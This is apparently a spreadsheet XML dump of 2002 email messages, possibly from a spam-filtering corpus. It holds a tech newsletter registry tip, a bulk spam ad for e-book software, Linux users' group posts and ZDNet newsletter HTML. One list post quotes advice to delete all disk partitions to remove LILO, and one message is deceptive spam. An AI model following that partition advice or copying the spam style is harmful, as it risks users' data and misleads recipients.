 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;&lt;b&gt;WE NEED YOU TO BE AT GNOMEDEX!&lt;/b&gt; That's what your employer should be telling you. Microsoft Pocket PC experts will be sharing tips on improving workplace productivity with portable devices. Combined with Proxim's on location wireless networking solutions, a Pocket PC can keep you and your co-workers communicating no matter where you are in the building. Learn how to bring Wi-FI and PDA technologies together for the ultimate in portable computing. &lt;a href="http://www.gnomedex.com"&gt;Register for Gnomedex today&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;b&gt;Electricon Land&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.electriconland.com/"&gt;http://www.electriconland.com/&lt;/a&gt;
 &lt;p&gt;
 {Icons for your machine} Gretchen and I are really looking forward
 to moving to our new neighborhood in a little over a month.
 Everything is better with a little dash of friendliness, right?
 Icons are no exception. All the action on this website is based
 around a city block of Electriconland. You walk into different
 stores to get different pixel art icons. Walk into Gabu's Pub and
 you will find icons in the likeness of Pink Floyd. You won't be
 disappointed when you go around the corner and pick up your
 Avengers icons from the comic store. If all this wasn't good
 enough then maybe this fact alone will send you to the street of
 Electriconland... all the icons are cross platform. This means you
 can have your new favorite icons on your Windows, Mac, and Linux
 machine, or maybe even a different one on each. The possibilities
 are endless!
 &lt;!-- TIP --&gt;
 &lt;p align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" href="http://www.lockergnome.com/recommend.html"&gt;Recommend It!&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeTIP&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 I just hate it when I try to install a program and the
 installation fails. I hate it even more when the program doesn't
 leave a log file to help me track down the problem. Some would say
 I am out of luck, but as long as the program uses Windows
 Installer, then I am on Cloud Nine. Why am I so happy? Because for
 any program that uses Windows Installer, I can turn on logging
 through the Registry. Navigate to HKEY_LOCAL_MACHINE \ Software \
 Policies \ Microsoft \ Windows \ Installer. Add a new String
 value, double-click it, and enter the following Value data:
 "voicewarmup" (sans quotes). These letters can be entered in any
 order: v = Verbose output; o = Out- of-disk-space messages; i =
 Status messages; c = Initial UI parameters; e = All error
 messages; w = Non-fatal warnings; a = Start up of actions; r =
 Action-specific records; m = Out-of- memory or fatal exit
 information; u = User requests; p = Terminal properties. If you
 add a plus, the existing file will be appended. If you add an
 exclamation mark, each line is flushed. Now, when something fails,
 I just have to check in the "Temp" directory and look for my log
 files. They'll vary in name, but will always start with "Msi" and
 end with the .LOG extension. As always, make sure to backup your
 registry before making any modifications.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href="http://www.lockergnome.com/issues/daily/20020716.html"&gt;http://www.lockergnome.com/issues/daily/20020716.html&lt;/a&gt;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color="#990000" face="Verdana, Tahoma, Arial" style="font-size: 8pt" size="1"&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;LOOK OVER HERE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.gnometomes.com/"&gt;Download Our Tip Files&lt;/a&gt;&lt;br&gt;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&lt;p&gt;
 &amp;nbsp;&lt;A HREF="http://lockergnome.pricegrabber.com/"&gt;Find the Lowest Price&lt;/A&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/submit.html"&gt;Suggest a Feature&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/advertise.html"&gt;Advertise With Us&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://store.lockergnome.com"&gt;The GnomeSTORE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;A HREF="http://seeker.dice.com/seeker.epl?rel_code=14"&gt;High-Tech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HREF="http://lockergnome.pricegrabber.com/search_getprod.php/isbn=0966103254/"&gt;Get Chris's Book&lt;/A&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About Us!&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="&amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#116;&amp;#111;&amp;#58;&amp;#102;&amp;#101;&amp;#101;&amp;#100;&amp;#98;&amp;#97;&amp;#99;&amp;#107;&amp;#64;&amp;#108;&amp;#111;&amp;#99;&amp;#107;&amp;#101;&amp;#114;&amp;#103;&amp;#110;&amp;#111;&amp;#109;&amp;#101;&amp;#46;&amp;#99;&amp;#111;&amp;#109;?subject=Lockergnome Windows Daily Feedback"&gt;General Feedback&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="&amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#116;&amp;#111;&amp;#58;&amp;#99;&amp;#104;&amp;#114;&amp;#105;&amp;#115;&amp;#64;&amp;#108;&amp;#111;&amp;#99;&amp;#107;&amp;#101;&amp;#114;&amp;#103;&amp;#110;&amp;#111;&amp;#109;&amp;#101;&amp;#46;&amp;#99;&amp;#111;&amp;#109;?subject=Lockergnome Windows Daily Comment"&gt;E-mail the Editor&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;A HREF="http://chris.pirillo.com/"&gt;The Editor's Blog&lt;/A&gt;&lt;BR&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;SEARCH&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;HAPPY FUN STUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 And now, we see how Sprocket thinks he has a right to eat pumpkin seeds. Or, would that be "pupkin" seeds?
 &lt;p&gt;
 &lt;a href="http://images.lockergnome.com/images/video/sprocket.pupkinseeds.WMV"&gt;Not for the Puppy&lt;/a&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;table align="center" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.lockergnome.com/webcam.html"&gt;
 &lt;img width="125" height="94" alt="Lockergnome Webcam Image" src="http://www.lockergnome.com/images/webcam/webcam32.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;font style="font-size: 7pt" size="1" face="Verdana, Tahoma, Arial"&gt;CLICK HERE TO ZOOM&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/font&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;center&gt;&lt;a href="http://store.lockergnome.com/"&gt;&lt;img src="http://images.lockergnome.com/images/shoppingbag.gif" width="100" height="142" border="0"&gt;&lt;/a&gt;&lt;/center&gt;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Dignity Shakedown --&gt;
 A hamburger by any other name ordinarily costs about twice as much.
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FREE e-Book Publishing Software - Download NOW!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Digital Authoring Tools - Free Software Alert!&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-885=
 9-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;center&gt;
 &lt;table width=3D"594" border=3D"1" cellspacing=3D"0" cellpadding=3D"4" bor=
 dercolor=3D"#0099CC"&gt;
 &lt;tr&gt;
 &lt;td colspan=3D"4"&gt;&lt;!3279hxfp6-161kkmd4091hUnq4-833JhMp2209Hbl38&gt;
 &lt;a href=3D"http://3dpageturningebook.com" style=3D"text-decoration:none;"=
 &gt;
 &lt;font color=3D"#0099CC" face=3D"Verdana, Arial, Helvetica, sans-serif" si=
 ze=3D"6"&gt;&lt;b&gt;FREE SOFTWARE!&lt;/b&gt; &lt;/font&gt;=20
 &lt;font color=3D"#000066" size=3D"3"&gt; &lt;b&gt;LIMITED TIME OFFER!*&lt;/b&gt;&lt;/font&gt;&lt;/a=
 &gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=3D"25%" align=3D"center" bgcolor=3D"#0066CC"&gt;
 &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" color=3D"#FFFFFF" si=
 ze=3D"-1"&gt;&lt;b&gt;FREE DOWNLOAD&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"25%" align=3D"center" bgcolor=3D"#339999"&gt;=20
 &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" color=3D"#FFFFFF" si=
 ze=3D"-1"&gt;&lt;b&gt;MORE INFO&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"25%" align=3D"center" bgcolor=3D"#00CC66"&gt;=20
 &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" color=3D"#FFFFFF" si=
 ze=3D"-1"&gt;&lt;b&gt;SAMPLES&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"25%" align=3D"center" bgcolor=3D"#9966FF"&gt;=20
 &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" color=3D"#FFFFFF" si=
 ze=3D"-1"&gt;&lt;b&gt;UNSUBSCRIBE&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=3D"25%" align=3D"center" valign=3D"top"&gt;
 &lt;font size=3D"-1" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;
 &lt;a href=3D"http://3dpageturningebook.com"&gt;DOWNLOAD 1&lt;/a&gt;&lt;br&gt;
 &lt;a href=3D"http://www.digitalpublishingtools.com"&gt;DOWNLOAD 2&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;=20
 &lt;/td&gt;
 &lt;td width=3D"25%" align=3D"center" valign=3D"top"&gt;=20
 &lt;font size=3D"-1" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;
 &lt;a href=3D"http://3dpageturningebook.com"&gt;MIRROR site 1&lt;/a&gt;&lt;br&gt;
 &lt;a href=3D"http://www.digitalpublishingtools.com"&gt;MIRROR site 2&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td width=3D"25%" align=3D"center" valign=3D"top"&gt;
 &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"-1"&gt;
 &lt;a href=3D"http://3dpageturningebook.com"&gt;SAMPLES site 1&lt;/a&gt;&lt;br&gt;
 &lt;a href=3D"http://www.digitalpublishingtools.com"&gt;SAMPLES site 2&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;=20
 &lt;/td&gt;
 &lt;td width=3D"25%" align=3D"center" valign=3D"top"&gt;=20
 &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"-1"&gt;
 &lt;a href=3D"http://3dpageturningebook.com"&gt;UnSubscribe 1&lt;/a&gt;&lt;br&gt;
 &lt;a href=3D"http://www.digitalpublishingtools.com"&gt;UnSubscribe 2&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;=20
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3D"4"&gt;=20
 &lt;p&gt;
 &lt;font face=3D"Verdana Arial, Helvetica, sans-serif" color=3D#000066 size=3D=
 2&gt;
 &lt;a href=3D"http://3dpageturningebook.com"&gt;&lt;b&gt;Digital Authoring Tools&lt;/b&gt;&lt;=
 /a&gt;=20
 offers FREE software that can help you CREATE PROFESSIONAL, &lt;b&gt;3D&lt;/b&gt; pag=
 e-turning and slide-show=20
 style digital brochures, documents, books, catalogs, invitations, photo a=
 lbums, resumes, newsletters,=20
 menus, email promotions, magazines, presentations and more!
 &lt;br&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;For more info, samples or a free download, click the ap=
 propriate link above! &amp;nbsp;
 Server demand is extremely high for this limited time free software offer=
 . &lt;b&gt;Please try these=20
 links periodically if a &lt;br&gt;site seems slow or unreachable.&lt;/b&gt;&lt;/font&gt;&lt;/f=
 ont&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan=3D"4"&gt;
 &lt;p align=3D"center"&gt;
 &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" color=3D#000066 size=
 =3D1&gt;Copyright =A9 2002 - Affiliate ID #1269&lt;br&gt;
 *FREE Version is FULLY FUNCTIONAL with NO EXPIRATION and has a 4 page (2 =
 page spread) limit.&lt;/font&gt;
 &lt;/p&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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On 13.08.2002 at 08:42:44, "John P. Looney" &lt;valen@tuatha.org&gt; wrote:
 &gt;  Vendors wrote their own wierd-ass installers &amp; config tools to lock
 &gt; people to their OS, they added all sorts of functionality that was not
 &gt; availible to other OSes to make themselves different from the competition
 &gt; (Motif on non-free OSes, incompatible filesystems etc).
 Not sure Motif is a good example, really. When Mozilla was going through its
 "Let's Use Motif/Let's Not" phase, Jamie Zawinski mentioned in passing that the
 installed base of Motif-bearing systems kicked the installed base of
 Linux-bearing systems into a huddled ball. Something, perhaps, to do with the
 fact that every
 Sun/Solaris box since version mumble shipped with it, plus every HP/UX box,
 and
 for all I know every other mainstream proprietary Linux. Motif was more a
 unifier across Unix subspecies than a differentiator.
 Now, filenames longer than 14 characters, maybe, or the options for ps (are we
 sysv or bsd?), or the whole /dev tree, or the libc implementation...
 Cheers,
 Waider.
 -- 
 waider@waider.ie / Yes, it /is/ very personal of me.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 11:28:05AM +0100, Satelle, StevenX wrote:
 &gt; When I was in school they pushed Irish down my throat. I developed a hatred
 &gt; for Irish. I did French for 3 years and German for 6 months, I could
 &gt; (almost) hold a basic conversation. I am proud of the fact that I don't know
 &gt; one word of Irish. 
 Going rapidly OT here, but I find it shocking that anybody could be
 proud of not knowing something. It's like the tourist on holidays using
 that speak-loudly-enough-and-they-will-understand technique or (slightly
 less off-topic) the friend or relative who says "I know nothing
 about computers!" and clearly doesn't intend to learn, and is happy
 to let you clean up after them.
 I certainly agree that Irish is not taught all that well (or wasn't
 when I was in school) but I'd like to be able to relearn it and to
 count it as one of my skills.
 David
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "Ouch. Ouch. Ouch. Ouch. Ouch...."(was Re: My brain hurts)
</t>
  </si>
  <si>
    <t xml:space="preserve">At 5:47 PM -0700 on 7/23/02, Joseph S. Barrera III wrote:
 &gt;     And the pirate says, "Aaar, its driving me nuts!"
 I can do better pirate jokes than *that*.
 Like, what's the 18th letter of the Pirate alphabet?
 No?
 Okay, a pirate koan then. What's the sound of a pirate clapping?
 :-).
 Cheers,
 RAH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http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 In a message dated 9/23/2002 6:30:31 PM, khare@alumni.caltech.edu writes:
 &gt; why you're writing with a double of scotch :-)
 because, obviously, after the inevitable second double, you won't remember 
 anything you say unless you write it down :-)
 Tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Liam Bedford stated the following:
 &gt; 
 &gt; On Wed, 31 Jul 2002 10:48:16 -0600 SoloCDM claiming to think:
 &gt; 
 &gt; &gt; "Hunt, Bryan" stated the following:
 &gt; 
 &gt; &gt;&gt; you need to do a "fdisk /mbr" from a bootable windoze floppy
 &gt; &gt;&gt; alternatively boot from linux boot disk and do fdisk, delete all
 &gt; &gt;&gt; partitions.
 &gt; 
 &gt; &gt; I need to ask a question concerning this issue.
 &gt; 
 &gt; &gt; What if I don't want to get rid of the MBR -- it will destroy the
 &gt; &gt; OS on that drive.  How do I remove lilo without the above fdisk
 &gt; &gt; procedure?
 &gt; 
 &gt; fdisk /mbr will restore a dos MBR.. it'll leave the partitions alone.
 &gt; 
 &gt; linux fdisk and deleting all partitions will actually leave LILO in
 &gt; the MBR though.
 While I am in Linux, the following message is the output when I
 execute fdisk /mbr, even though the drive is in read and write mode:
 Unable to open /mbr
 The mbr is on a separate drive -- not related to the Linux drive.
 -- 
 Note: When you reply to this message, please include the mailing
       list and/or newsgroup address and my email address in To:
 *********************************************************************
 Signed,
 SoloCDM
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie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</si>
  <si>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=3D60-oqItIsEAuUWbnYDLN8S_eSgFWVRR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
         &lt;img src=3D"http://www.zdnet.com/techupdate/i/gl_ad2.gif" width=3D"=
 160" height=3D"16" border=3D"0"  alt=3D"Advertisement"&gt;&lt;br&gt;
         &lt;!--tower --&gt;
       &lt;iframe src=3D"http://www.zdnet.com/include/ads/ifc/RGROUP=3D2766" sc=
 rolling=3D"no" frameborder=3D"0" hspace=3D"0" vspace=3D"0" height=3D"600" w=
 idth=3D"160" marginheight=3D"0" marginwidth=3D"0"&gt;
 &lt;script language=3D"JavaScript" src=3D"http://www.zdnet.com/include/ads/js/=
 RGROUP=3D2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;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href=3D"http://clickthru.online.com/Click?q=3D75-whwtIKU=
 AIZStr2o_rjups7LLZ5ZR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img s=
 rc=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6"&gt;&lt;br=
 &gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D8a-3y3dQXn=
 da3GlnEKO3Nt-tKChBwnR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out these personal laser printer picks at ZDNet Reviews.&lt;/b&gt;&lt;/font&gt;&lt;/=
 a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" hei=
 ght=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Da0-11h8QQB=
 qXH3ywDPUByjw2PB1s7iR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 See how WAP works and how you should use it at Builder.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;=
 br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=
 =3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Db5-50FcQ7U=
 7vHdEUfZ1PHq15ZNEEZPR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a new job? Find one today in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;=
  &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D=
 "6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dca-iciuQUg=
 FRLJ8DTfcl8jfOfRHHUnR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 CIOs talk out about the future of IT at CNET News.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;=
 img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6=
 "&gt;&lt;br&gt;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&gt;WED JUL 10,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ck?q=3Ddf-1kJhQLEFHEQTE9HfbQq-Kh1XhaeR" &gt;&lt;b&gt;MS's Palladium: What the hell i=
 s it? (Here's what!)&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/gra=
 phics/clear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 Everybody's talking about Palladium, Microsoft's new "trust=
 worthy computing" architecture. But the details on what it is and how it wi=
 ll work are still extremely sketchy. Here's what I've been able to piece to=
 gether so far.&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Df4-Y-XEQ0s=
 kGxV4lK8uUJ5QddfWmTyR" &gt;&lt;b&gt;NOTE: Why we're changing our publishing schedule=
 &lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D09-joDSIj8=
 8wYlmYsALYSS7ZMgtY8lR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: Kicked out of Macworld&lt;/=
 b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b=
 .gif"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href=3D"http://clickthru.online.com/Click?q=3D1e-JQuLI4jWHdqQRtd=
 qEsB8LE27qd4R" &gt;WiFi nets: Stop sharing!... iPod for Linux... Super-sized n=
 otebooks &lt;/a&gt;&lt;p&gt;
          =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D34-pJpSIcd819ba8hq=
 3_tvVyn4IcgyR" &gt;Why cyberterrorists don't care about your PC&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D49-ZM4cIEpSenW2Kzj=
 VX4RVXFO5JSFR" &gt;Guilty pleasures: 3 top politically incorrect games&lt;/a&gt;&lt;p&gt;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cellspacing=
 =3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt;   &lt;tr bgcolor=3D"#999999"&gt;&lt;td cols=
 pan=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ffff=
 ff" size=3D"-2"&gt;&lt;b&gt;Crucial Clicks: More from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;   &lt;=
 tr&gt;   &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;   &lt;td row=
 span=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b=
 .gif" height=3D1 width=3D5&gt;&lt;/td&gt;   &lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www=
 .zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;&lt;/td&gt; =
   &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;   &lt;td bgcolor=3D"#999999" rowspan=
 =3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif=
 " height=3D1 width=3D1&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr valign=3D"top"&gt;   &lt;td width=3D"1=
 00%"&gt;          &lt;table width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" b=
 order=3D"0"&gt;        &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;font face=3D"verdana, geneva" co=
 lor=3D"#333333" size=3D"-2"&gt;&lt;b&gt;PDAS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src=3D"http://www.=
 zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;=
 /td&gt;&lt;/tr&gt;        &lt;tr valign=3D"top"&gt;       &lt;td width=3D"85"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D5e-ssGdIn06tVsPzPPhsnStcVTQzc9R" &gt;&lt;img sr=
 c=3D"http://www.zdnet.com/products/graphics/060502_Palmapps.jpg" width=3D"8=
 5" height=3D"110" border=3D"0" alt=3D"" /&gt;&lt;/a&gt;&lt;/td&gt;           &lt;td width=3D"=
 5"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" he=
 ight=3D1 width=3D5&gt;&lt;/td&gt;        &lt;td width=3D"100%"&gt;&lt;font face=3D"arial, hel=
 vetica" size=3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D73-__Z=
 eIBBtWIc2v4DT8UEE0WNrUZcR" style=3D"text-decoration:none"&gt;&lt;b&gt;An industry fi=
 rst&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;ZDNet reviewers take a look at Toshiba's e740, the first P=
 DA with Intel's new XScale processor and integrated WiFi connectivity.&lt;/fon=
 t&gt;&lt;/td&gt;         &lt;/tr&gt;           &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://ww=
 w.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /=
 &gt;&lt;img src=3D"http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width=
 =3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;font face=3D"arial, helvetica=
 " size=3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D88-ec5PQQKx6=
 IoO4h7-rU358atSBbiR" style=3D"text-decoration:none"&gt;Read our Full Review&lt;/a=
 &gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;           &lt;/table&gt;   &lt;/td&gt;   &lt;td&gt;&lt;img src=3D"http://www.=
 zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;  =
  &lt;td width=3D"180"&gt;    &lt;table cellpadding=3D"0" cellspacing=3D"0" width=3D"=
 180" border=3D"0" bgcolor=3D"#eeeeee"&gt;        &lt;tr bgcolor=3D"#999999"&gt;&lt;td c=
 olspan=3D"3" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#f=
 fffff" size=3D"-2"&gt;yMost Popular Products&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;          &lt;tr&gt;   =
  &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" =
 width=3D"10" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;td&gt;&lt;font f=
 ace=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/=
 graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"5" alt=3D"" bord=
 er=3D"0" /&gt;&lt;br /&gt;    &lt;b&gt;Handhelds&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com=
 /graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"7" alt=3D"" bor=
 der=3D"0" /&gt;&lt;br /&gt;       &lt;b&gt;1&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/C=
 lick?q=3D9d-kkCWQv0umMiWedyuKLvd75wKZzPR" style=3D"text-decoration:none"&gt;To=
 shiba Pocket PC e310&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anc=
 hordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;=
 br /&gt;       &lt;b&gt;2&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3Db2-M=
 4pwQX0a3ZUOM5SjM2cmpxUCPunR" style=3D"text-decoration:none"&gt;Toshiba Pocket =
